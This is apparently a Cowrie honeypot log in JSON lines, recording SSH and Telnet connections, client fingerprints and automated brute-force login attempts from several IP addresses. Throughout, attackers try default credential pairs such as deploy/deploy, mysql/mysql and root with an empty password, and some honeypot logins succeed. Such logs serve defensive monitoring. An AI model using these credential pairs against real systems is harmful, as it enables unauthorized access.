{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:25:56.663957Z","src_ip":"196.251.86.249","session":"57f54aada845"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"deploy","message":"login attempt [deploy/deploy] failed","sensor":"my-vps","timestamp":"2025-08-26T09:25:59.300728Z","src_ip":"196.251.86.249","session":"57f54aada845"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:26:00.812220Z","src_ip":"196.251.86.249","session":"57f54aada845"}
{"eventid":"cowrie.session.closed","duration":31.766812324523926,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:26:08.906263Z","src_ip":"212.227.125.160","session":"935fec7b43c2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50792,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c3470e9b9b8","protocol":"ssh","message":"New connection: 212.227.235.229:50792 (1.2.3.4:22) [session: 7c3470e9b9b8]","sensor":"my-vps","timestamp":"2025-08-26T09:26:58.110730Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:26:58.111811Z","src_ip":"212.227.235.229","session":"7c3470e9b9b8"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-26T09:26:58.325905Z","src_ip":"212.227.235.229","session":"7c3470e9b9b8"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":39470,"dst_ip":"1.2.3.4","dst_port":22,"session":"b500a031c454","protocol":"ssh","message":"New connection: 196.251.86.249:39470 (1.2.3.4:22) [session: b500a031c454]","sensor":"my-vps","timestamp":"2025-08-26T09:27:02.037547Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:27:02.450548Z","src_ip":"196.251.86.249","session":"b500a031c454"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:27:02.451235Z","src_ip":"196.251.86.249","session":"b500a031c454"}
{"eventid":"cowrie.login.failed","username":"test","password":"test","message":"login attempt [test/test] failed","sensor":"my-vps","timestamp":"2025-08-26T09:27:03.782523Z","src_ip":"196.251.86.249","session":"b500a031c454"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:27:05.181298Z","src_ip":"196.251.86.249","session":"b500a031c454"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:27:06.115292Z","src_ip":"212.227.235.229","session":"7c3470e9b9b8"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63738,"dst_ip":"1.2.3.4","dst_port":22,"session":"09bd9759d112","protocol":"ssh","message":"New connection: 217.72.205.35:63738 (1.2.3.4:22) [session: 09bd9759d112]","sensor":"my-vps","timestamp":"2025-08-26T09:27:42.660852Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:27:42.662709Z","src_ip":"217.72.205.35","session":"09bd9759d112"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":38576,"dst_ip":"1.2.3.4","dst_port":22,"session":"380e798d6f0e","protocol":"ssh","message":"New connection: 196.251.86.249:38576 (1.2.3.4:22) [session: 380e798d6f0e]","sensor":"my-vps","timestamp":"2025-08-26T09:28:07.598811Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:28:07.946148Z","src_ip":"196.251.86.249","session":"380e798d6f0e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:28:07.946912Z","src_ip":"196.251.86.249","session":"380e798d6f0e"}
{"eventid":"cowrie.login.failed","username":"nagios","password":"nagios","message":"login attempt [nagios/nagios] failed","sensor":"my-vps","timestamp":"2025-08-26T09:28:09.156526Z","src_ip":"196.251.86.249","session":"380e798d6f0e"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:28:10.492320Z","src_ip":"196.251.86.249","session":"380e798d6f0e"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":43076,"dst_ip":"1.2.3.4","dst_port":22,"session":"b7d3ce78afd5","protocol":"ssh","message":"New connection: 196.251.86.249:43076 (1.2.3.4:22) [session: b7d3ce78afd5]","sensor":"my-vps","timestamp":"2025-08-26T09:29:09.649207Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:29:09.737594Z","src_ip":"196.251.86.249","session":"b7d3ce78afd5"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:29:09.738388Z","src_ip":"196.251.86.249","session":"b7d3ce78afd5"}
{"eventid":"cowrie.login.failed","username":"guest","password":"guest","message":"login attempt [guest/guest] failed","sensor":"my-vps","timestamp":"2025-08-26T09:29:10.152776Z","src_ip":"196.251.86.249","session":"b7d3ce78afd5"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:29:11.611715Z","src_ip":"196.251.86.249","session":"b7d3ce78afd5"}
{"eventid":"cowrie.session.connect","src_ip":"93.123.109.189","src_port":55338,"dst_ip":"1.2.3.4","dst_port":22,"session":"170009167a55","protocol":"ssh","message":"New connection: 93.123.109.189:55338 (1.2.3.4:22) [session: 170009167a55]","sensor":"my-vps","timestamp":"2025-08-26T09:30:04.913648Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:30:04.935007Z","src_ip":"93.123.109.189","session":"170009167a55"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":46194,"dst_ip":"1.2.3.4","dst_port":22,"session":"dd2909129967","protocol":"ssh","message":"New connection: 196.251.86.249:46194 (1.2.3.4:22) [session: dd2909129967]","sensor":"my-vps","timestamp":"2025-08-26T09:30:11.581437Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:30:12.248531Z","src_ip":"196.251.86.249","session":"dd2909129967"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:30:12.249298Z","src_ip":"196.251.86.249","session":"dd2909129967"}
{"eventid":"cowrie.login.failed","username":"weblogic","password":"weblogic","message":"login attempt [weblogic/weblogic] failed","sensor":"my-vps","timestamp":"2025-08-26T09:30:15.254462Z","src_ip":"196.251.86.249","session":"dd2909129967"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:30:16.587712Z","src_ip":"196.251.86.249","session":"dd2909129967"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":48618,"dst_ip":"1.2.3.4","dst_port":22,"session":"b4f31d47181c","protocol":"ssh","message":"New connection: 196.251.86.249:48618 (1.2.3.4:22) [session: b4f31d47181c]","sensor":"my-vps","timestamp":"2025-08-26T09:31:13.704490Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:31:14.252481Z","src_ip":"196.251.86.249","session":"b4f31d47181c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:31:14.254628Z","src_ip":"196.251.86.249","session":"b4f31d47181c"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"mysql","message":"login attempt [mysql/mysql] failed","sensor":"my-vps","timestamp":"2025-08-26T09:31:16.438884Z","src_ip":"196.251.86.249","session":"b4f31d47181c"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:31:18.709420Z","src_ip":"196.251.86.249","session":"b4f31d47181c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57098,"dst_ip":"1.2.3.4","dst_port":23,"session":"ca3bdef2882a","protocol":"telnet","message":"New connection: 212.227.125.160:57098 (1.2.3.4:23) [session: ca3bdef2882a]","sensor":"my-vps","timestamp":"2025-08-26T09:31:31.909282Z"}
{"eventid":"cowrie.session.closed","duration":4.112541675567627,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:31:36.021764Z","src_ip":"212.227.125.160","session":"ca3bdef2882a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44450,"dst_ip":"1.2.3.4","dst_port":23,"session":"4f852925b076","protocol":"telnet","message":"New connection: 212.227.125.160:44450 (1.2.3.4:23) [session: 4f852925b076]","sensor":"my-vps","timestamp":"2025-08-26T09:31:36.177578Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-26T09:31:38.080339Z","src_ip":"212.227.125.160","session":"4f852925b076"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T09:31:38.108401Z","src_ip":"212.227.125.160","session":"4f852925b076"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"3.7","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:31:41.849462Z","src_ip":"212.227.125.160","session":"4f852925b076"}
{"eventid":"cowrie.session.closed","duration":5.67698335647583,"message":"Connection lost after 5 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:31:41.854483Z","src_ip":"212.227.125.160","session":"4f852925b076"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":50664,"dst_ip":"1.2.3.4","dst_port":22,"session":"0db22f36b8c8","protocol":"ssh","message":"New connection: 196.251.86.249:50664 (1.2.3.4:22) [session: 0db22f36b8c8]","sensor":"my-vps","timestamp":"2025-08-26T09:32:15.934856Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:32:16.579171Z","src_ip":"196.251.86.249","session":"0db22f36b8c8"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T09:32:16.579808Z","src_ip":"196.251.86.249","session":"0db22f36b8c8"}
{"eventid":"cowrie.login.failed","username":"apache","password":"apache","message":"login attempt [apache/apache] failed","sensor":"my-vps","timestamp":"2025-08-26T09:32:18.975242Z","src_ip":"196.251.86.249","session":"0db22f36b8c8"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T09:32:20.564359Z","src_ip":"196.251.86.249","session":"0db22f36b8c8"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":36128,"dst_ip":"1.2.3.4","dst_port":22,"session":"5e26ef1f2904","protocol":"ssh","message":"New connection: 45.88.8.215:36128 (1.2.3.4:22) [session: 5e26ef1f2904]","sensor":"my-vps","timestamp":"2025-08-26T09:32:57.880053Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T09:32:58.152554Z","src_ip":"45.88.8.215","session":"5e26ef1f2904"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T09:32:58.153329Z","src_ip":"45.88.8.215","session":"5e26ef1f2904"}
{"eventid":"cowrie.login.success","username":"root","password":"Lokajit@123","message":"login attempt [root/Lokajit@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T09:32:59.887162Z","src_ip":"45.88.8.215","session":"5e26ef1f2904"}
